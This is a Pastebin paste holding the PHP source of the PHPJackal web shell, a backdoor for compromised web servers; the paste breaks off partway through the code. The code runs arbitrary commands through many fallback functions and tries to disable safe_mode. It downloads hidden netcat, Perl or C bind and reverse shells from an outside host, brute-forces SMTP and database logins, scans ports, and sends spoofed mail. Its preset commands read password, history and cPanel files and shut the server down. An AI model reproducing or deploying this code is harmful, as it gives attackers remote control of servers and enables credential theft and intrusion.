Gennike_Code

PHPJackal Shell

Dec 31st, 2015
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 99.73 KB | None | 0 0
  1.  
  2. |==============================================|
  3. | gennikemk.comxa.com |
  4. ==============================================
  5. <?php
  6. #--Config--#
  7. $login_password='';#Login password
  8. $IP=array();#Allowed users [$IP=array('192.168.100.5','192.168.100.9');]
  9. #----------#
  10. error_reporting(0);
  11. ignore_user_abort(true);
  12. set_time_limit(0);
  13. ini_set('max_execution_time','0');
  14. ini_set('memory_limit','9999M');
  15. ini_set('output_buffering',0);
  16. set_magic_quotes_runtime(0);
  17. if(!isset($_SERVER))$_SERVER=&$HTTP_SERVER_VARS;
  18. if(!isset($_POST))$_POST=&$HTTP_POST_VARS;
  19. if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
  20. if(!isset($_COOKIE))$_COOKIE=&$HTTP_COOKIE_VARS;
  21. if(!isset($_FILES))$_FILES=&$HTTP_POST_FILES;
  22. $_REQUEST = array_merge($_GET,$_POST);
  23. if(get_magic_quotes_gpc()){
  24. foreach($_REQUEST as $key=>$value)$_REQUEST[$key]=stripslashes($value);
  25. }
  26. if(count($IP) && !in_array($_SERVER['REMOTE_ADDR'],$IP))die('Access denied!');
  27. function hlinK($str=''){
  28. $myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
  29. $ret=$_SERVER['PHP_SELF'].'?';
  30. $new=explode('&',$str);
  31. foreach($_GET as $key => $v){
  32. $add=1;
  33. foreach($new as $m){
  34. $el=explode('=',$m);
  35. if($el[0]==$key)$add=0;
  36. }
  37. if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";}
  38. }
  39. $ret.=$str;
  40. return $ret;
  41. }
  42. header('Cache-Control: no-cache, must-revalidate');
  43. header('Expires: Mon, 7 Aug 1987 05:00:00 GMT');
  44. $et='</td></tr></table>';
  45. if(!empty($login_password)){
  46. if(!empty($_REQUEST['fpassw'])){
  47. if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
  48. header('Location: '.hlinK());
  49. }
  50. if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>");
  51. }
  52. if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']);
  53. $disablefunctions=ini_get('disable_functions');
  54. $disablefunctions=explode(',',$disablefunctions);
  55. function checkthisporT($ip,$port,$timeout,$type=0){
  56. if(!$type){
  57. $scan=fsockopen($ip,$port,$n,$s,$timeout);
  58. if($scan){fclose($scan);return 1;}
  59. }
  60. elseif(function_exists('socket_set_timeout')){
  61. $scan=fsockopen("udp://$ip",$port);
  62. if($scan){
  63. socket_set_timeout($scan,$timeout);
  64. fwrite($scan,"\x00");
  65. $s=time();
  66. fread($scan,1);
  67. if((time()-$s)>=$timeout){fclose($scan);return 1;}
  68. }
  69. }
  70. return 0;
  71. }
  72. if(!function_exists('is_executable')){
  73. function is_executable($addr){
  74. return 0;
  75. }
  76. }
  77. if(!function_exists('file_get_contents')){
  78. function file_get_contents($addr){
  79. $a=fopen($addr,'r');
  80. $tmp=fread($a,filesize($a));
  81. fclose($a);
  82. if($a)return $tmp;else return null;
  83. }
  84. }
  85. if(!function_exists('file_put_contents')){
  86. function file_put_contents($addr,$con){
  87. $a=fopen($addr,'w');
  88. if(!$a)return 0;
  89. $t=fwrite($a,$con);
  90. fclose($a);
  91. if($t)return strlen($con);
  92. return 0;
  93. }
  94. }
  95. function file_add_contentS($addr,$con){
  96. $a=fopen($addr,'a');
  97. if(!$a)return 0;
  98. fwrite($a,$con);
  99. fclose($a);
  100. return strlen($con);
  101. }
  102. if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
  103. if(!empty($_REQUEST['downloaD'])){
  104. ob_clean();
  105. $dl=$_REQUEST['downloaD'];
  106. $con=file_get_contents($dl);
  107. header('Content-type: application/octet-stream');
  108. header("Content-disposition: attachment; filename=\"$dl\";");
  109. header('Content-length: '.strlen($con));
  110. echo $con;
  111. exit;
  112. }
  113. if(!empty($_REQUEST['imagE'])){
  114. $img=$_REQUEST['imagE'];
  115. header('Content-type: imagE/gif');
  116. header("Content-length: ".filesize($img));
  117. header("Last-Modified: ".date('r',filemtime($img)));
  118. echo file_get_contents($img);
  119. exit;
  120. }
  121. if(!empty($_REQUEST['exT'])){
  122. $ex=$_REQUEST['exT'];
  123. $e=get_extension_funcs($ex);
  124. echo '<html><head><title>'.htmlspecialchars($ex).'</title></head><body><b>Functions:</b><br>';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<font color=red>DISABLED</font>';echo '<br>';}
  125. echo '</body></html>';
  126. exit;
  127. }
  128. function showsizE($size){
  129. if($size>=1073741824)$size=round(($size/1073741824),2).' GB';
  130. elseif($size>=1048576)$size=round(($size/1048576),2).' MB';
  131. elseif($size>=1024)$size=round(($size/1024),2).' KB';
  132. else $size.=' B';
  133. return $size;
  134. }
  135. $windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
  136. $errorbox="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>";
  137. $v='1.9';
  138. $cwd=getcwd();
  139. $msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>";
  140. $intro="<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href='http://netjackal.by.ru/' target='_blank'>http://netjackal.by.ru/</a><br><b>Email:</b> <a href='mailto:nima_501@yahoo.com?subject=PHPJackal'>nima_501@yahoo.com</a><br><noscript>".str_repeat('-=-',25)."<br><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et</center>";
  141. $footer="${msgbox}PHPJackal v$v - Powered By <a href='http://netjackal.by.ru/' target='_blank'>NetJackal</a>$et";
  142. $hcwd="<input type=hidden name=workingdiR value='$cwd'>";
  143. $t="<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>";
  144. $crack="</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
  145. function checkfunctioN($func){
  146. global $disablefunctions,$safemode;
  147. $safe=array('passthru','system','exec','shell_exec','popen','proc_open');
  148. if($safemode=='ON' && in_array($func,$safe))return 0;
  149. elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
  150. return 0;
  151. }
  152. function whereistmP(){
  153. $uploadtmp=ini_get('upload_tmp_dir');
  154. $uf=getenv('USERPROFILE');
  155. $af=getenv('ALLUSERSPROFILE');
  156. $se=ini_get('session.save_path');
  157. $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  158. if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  159. if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  160. if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  161. if(is_dir($uf) && is_writable($uf))return $uf;
  162. if(is_dir($af) && is_writable($af))return $af;
  163. if(is_dir($se) && is_writable($se))return $se;
  164. if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  165. if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  166. return '.';
  167. }
  168. function shelL($command){
  169. global $windows;
  170. $exec=$output='';
  171. $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  172. if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
  173. elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
  174. elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}
  175. elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);
  176. elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
  177. elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
  178. elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);
  179. elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);
  180. elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
  181. elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);
  182. elseif(extension_loaded('perl'))$exec=perlshelL($command);
  183. return $exec;
  184. }
  185. function getiT($get){
  186. $fo=strtolower(ini_get('allow_url_fopen'));
  187. $ui=strtolower(ini_get('allow_url_include'));
  188. if($fo || $fo=='on')$con=file_get_contents($get);
  189. elseif($ui || $ui=='on'){
  190. ob_start();
  191. include($get);
  192. $con=ob_get_contents();
  193. ob_end_clean();
  194. }
  195. else{
  196. $u=parse_url($get);
  197. $host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];
  198. $url=fsockopen($host,$port,$en,$es,12);
  199. fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
  200. $tmp=$con='';
  201. while($tmp!="\r\n")$tmp=fgets($url);
  202. while(!feof($url))$con.=fgets($url);
  203. }
  204. return $con;
  205. }
  206. function downloadiT($get,$put){
  207. $con=getiT($get);
  208. $mk=file_put_contents($put,$con);
  209. if($mk)return 1;
  210. return 0;
  211. }
  212. function winshelL($command){
  213. $name=whereistmP()."\\".uniqid('NJ');
  214. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  215. sleep(1);
  216. $exec=file_get_contents($name);
  217. unlink($name);
  218. return $exec;
  219. }
  220. function ffishelL($command){
  221. $name=whereistmP()."\\".uniqid('NJ');
  222. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  223. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  224. while(!file_exists($name))sleep(1);
  225. $exec=file_get_contents($name);
  226. unlink($name);
  227. return $exec;
  228. }
  229. function srvshelL($command){
  230. $name=whereistmP()."\\".uniqid('NJ');
  231. $n=uniqid('NJ');
  232. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  233. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  234. win32_start_service($n);
  235. win32_stop_service($n);
  236. win32_delete_service($n);
  237. while(!file_exists($name))sleep(1);
  238. $exec=file_get_contents($name);
  239. unlink($name);
  240. return $exec;
  241. }
  242. function comshelL($command,$ws){
  243. $exec=$ws->exec("cmd.exe /c $command");
  244. $so=$exec->StdOut();
  245. return $so->ReadAll();
  246. }
  247. function perlshelL($command){
  248. $perl=new perl();
  249. ob_start();
  250. $perl->eval("system('$command')");
  251. $exec=ob_get_contents();
  252. ob_end_clean();
  253. return $exec;
  254. }
  255. function smtpchecK($addr,$user,$pass,$timeout){
  256. $sock=fsockopen($addr,25,$n,$s,$timeout);
  257. if(!$sock)return -1;
  258. fread($sock,1024);
  259. fputs($sock,'ehlo '.uniqid('NJ')."\r\n");
  260. $res=substr(fgets($sock,512),0,1);
  261. if($res!='2')return 0;
  262. fgets($sock,512);fgets($sock,512);fgets($sock,512);
  263. fputs($sock,"AUTH LOGIN\r\n");
  264. $res=substr(fgets($sock,512),0,3);
  265. if($res!='334')return 0;
  266. fputs($sock,base64_encode($user)."\r\n");
  267. $res=substr(fgets($sock,512),0,3);
  268. if($res!='334')return 0;
  269. fputs($sock,base64_encode($pass)."\r\n");
  270. $res=substr(fgets($sock,512),0,3);
  271. if($res!='235')return 0;
  272. return 1;
  273. }
  274. function mysqlchecK($host,$user,$pass,$timeout){
  275. if(function_exists('mysql_connect')){
  276. $l=mysql_connect($host,$user,$pass);
  277. if($l)return 1;
  278. }
  279. return 0;
  280. }
  281. function mssqlchecK($host,$user,$pass,$timeout){
  282. if(function_exists('mssql_connect')){
  283. $l=mssql_connect($host,$user,$pass);
  284. if($l)return 1;
  285. }
  286. return 0;
  287. }
  288. function checksmtP($host,$timeout){
  289. $from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';
  290. $sock=fsockopen($host,25,$n,$s,$timeout);
  291. if(!$sock)return -1;
  292. $res=substr(fgets($sock,512),0,3);
  293. if($res!='220')return 0;
  294. fputs($sock,'HELO '.uniqid('NJ')."\r\n");
  295. $res=substr(fgets($sock,512),0,3);
  296. if($res!='250')return 0;
  297. fputs($sock,"MAIL FROM: <$from>\r\n");
  298. $res=substr(fgets($sock,512),0,3);
  299. if($res!='250')return 0;
  300. fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
  301. $res=substr(fgets($sock,512),0,3);
  302. if($res!='250')return 0;
  303. fputs($sock,"DATA\r\n");
  304. $res=substr(fgets($sock,512),0,3);
  305. if($res!='354')return 0;
  306. fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");
  307. $res=substr(fgets($sock,512),0,3);
  308. if($res!='250')return 0;
  309. return 1;
  310. }
  311. function replace_stR($s,$h){
  312. $ret=$h;
  313. foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
  314. return $ret;
  315. }
  316. function check_urL($url,$method,$search='200',$timeout=3){
  317. $u=parse_url($url);
  318. $method=strtoupper($method);
  319. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
  320. $data=(!empty($u['query']))?$u['query']:'';
  321. if(!empty($data))$data="?$data";
  322. $sock=fsockopen($host,$port,$en,$es,$timeout);
  323. if($sock){
  324. fputs($sock,"$method $file$data HTTP/1.0\r\n");
  325. fputs($sock,"Host: $host\r\n");
  326. if($method=='GET')fputs($sock,"\r\n");
  327. elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
  328. else return 0;
  329. if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}
  330. while(!feof($sock)){
  331. $res=fgets($sock);
  332. if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
  333. }
  334. fclose($sock);
  335. }
  336. return 0;
  337. }
  338. function get_sw_namE($host,$timeout){
  339. $sock=fsockopen($host,80,$en,$es,$timeout);
  340. if($sock){
  341. $page=uniqid('NJ');
  342. fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
  343. while(!feof($sock)){
  344. $con=fgets($sock);
  345. if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
  346. }
  347. fclose($sock);
  348. return -1;
  349. }return 0;
  350. }
  351. function snmpchecK($ip,$com,$timeout){
  352. $res=0;
  353. $n=chr(0x00);
  354. $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;
  355. $sock=fsockopen("udp://$ip",161);
  356. if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);
  357. fputs($sock,$packet);
  358. socket_set_timeout($sock,$timeout);
  359. $res=fgets($sock);
  360. fclose($sock);
  361. if($res != '')return 1;else return 0;
  362. }
  363. $safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';
  364. if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
  365. function brshelL(){
  366. global $errorbox,$windows,$et,$hcwd;
  367. $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
  368. $addr='http://netjackal.by.ru/br';
  369. $error="$errorbox Can not make backdoor file, go to writeable folder.$et";
  370. $n=uniqid('NJ_');
  371. if(!$windows)$n=".$n";
  372. $d=whereistmP();
  373. $name=$d.DIRECTORY_SEPARATOR.$n;
  374. $c=($_REQUEST['C'])?1:0;
  375. if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){
  376. $port=(int)$_REQUEST['port'];
  377. if($windows){
  378. if($c){
  379. $name.='.exe';
  380. $bd=downloadiT("$addr/nc",$name);
  381. shelL("attrib +H $name");
  382. if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
  383. }else{
  384. $name=$name.'.pl';
  385. $bd=downloadiT("$addr/winbind.p",$name);
  386. shelL("attrib +H $name");
  387. if(!$bd)echo $error;else shelL("perl $name $port");
  388. }
  389. }
  390. else{
  391. if($c){
  392. $bd=downloadiT("$addr/bind.c",$name);
  393. if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
  394. }else{
  395. $bd=downloadiT("$addr/bind.p",$name);
  396. if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");
  397. echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
  398. }
  399. }
  400. }
  401. elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
  402. $ip=$_REQUEST['ip'];
  403. $port=(int)$_REQUEST['rport'];
  404. if($windows){
  405. if($c){
  406. $name.='.exe';
  407. $bd=downloadiT("$addr/nc",$name);
  408. shelL("attrib +H $name");
  409. if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
  410. }else{
  411. $name=$name.'.pl';
  412. $bd=downloadiT("$addr/winrc.p",$name);
  413. shelL("attrib +H $name");
  414. if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");
  415. }
  416. }
  417. else{
  418. if($c){
  419. $bd=downloadiT("$addr/rc.c",$name);
  420. if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
  421. }else{
  422. $bd=downloadiT("$addr/rc.p",$name);
  423. if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
  424. }
  425. }
  426. echo '<font color=blue>Done!</font>';}
  427. else{echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";echo $_SERVER['REMOTE_ADDR'];echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";}}
  428. function showimagE($img){
  429. echo "<center><img border=0 src='".hlinK("imagE=$img&&workingdiR=".getcwd())."'></center>";}
  430. function editoR($file){
  431. global $errorbox,$et,$hcwd,$cwd;
  432. if(is_file($file)){
  433. if(!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
  434. if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
  435. $data=file_get_contents($file);
  436. echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='".htmlspecialchars($file)."' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>";
  437. echo htmlspecialchars($data);
  438. echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
  439. }
  440. else {echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>";
  441. }
  442. echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>";
  443. }
  444. function webshelL(){
  445. global $windows,$hcwd,$et,$cwd;
  446. if($windows){
  447. $alias="<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>";
  448. }
  449. else{
  450. $alias="<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>";
  451. if(is_dir('/etc/valiases'))$alias.="<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>";
  452. if(is_dir('/var/spool/mail/'))$alias.="<option value='ls /var/spool/mail/'>Mailboxes list</option>";
  453. }
  454. echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>";
  455. if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);
  456. echo"</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";if(!empty($_REQUEST['cmd']))echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows)echo "cat /etc/passwd";echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>";
  457. }
  458. function maileR(){
  459. global $msgbox,$et,$hcwd;
  460. if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
  461. $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
  462. if(mail($to,$subject,$body,"From: $from"))echo "$msgbox<b>Mail sent!</b><br>$et";
  463. }
  464. echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>".ini_get('SMTP').' ('.ini_get('smtp_port').")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='evil@hell.gov' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";if(!empty($_ENV['SERVER_ADMIN']))echo $_ENV['SERVER_ADMIN'];else echo 'admin@'.getenv('HTTP_HOST'); echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et";
  465. }
  466. function scanneR(){
  467. global $hcwd,$et;
  468. if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';
  469. $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
  470. if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
  471. $target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;
  472. echo '<font color=blue>Port scanning started against '.htmlspecialchars($target).':<br>';
  473. $start=time();
  474. for($i=$from;$i<=$to;$i++){
  475. if($tcp){
  476. if(checkthisporT($target,$i,$timeout)){
  477. $nu++;
  478. $ser='';
  479. if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')';
  480. echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>";
  481. }
  482. }
  483. if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]<br>";}
  484. }
  485. $time=time()-$start;
  486. echo "Done! ($time seconds)</font>";
  487. }
  488. elseif(!empty($_REQUEST['securityscanner'])){
  489. echo '<font color=blue>';
  490. $start=time();
  491. $from=$_REQUEST['from'];
  492. $to=(int)$_REQUEST['to'];
  493. $timeout=(int)$_REQUEST['timeout'];
  494. $f=substr($from,strrpos($from,'.')+1);
  495. $from=substr($from,0,strrpos($from,'.'));
  496. if(!empty($_REQUEST['httpscanner'])){
  497. echo 'Loading webserver bug list...';
  498. $buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL');
  499. $dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
  500. if($dl){$file=file($buglist);echo 'Done! scanning started.<br><br>';}else echo 'Failed!!! scanning started without webserver security testing...<br><br>';
  501. }else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:<br><br>";}
  502. for($i=$f;$i<=$to;$i++){
  503. $output=0;
  504. $ip="$from.$i";
  505. if(!empty($_REQUEST['nslookup'])){
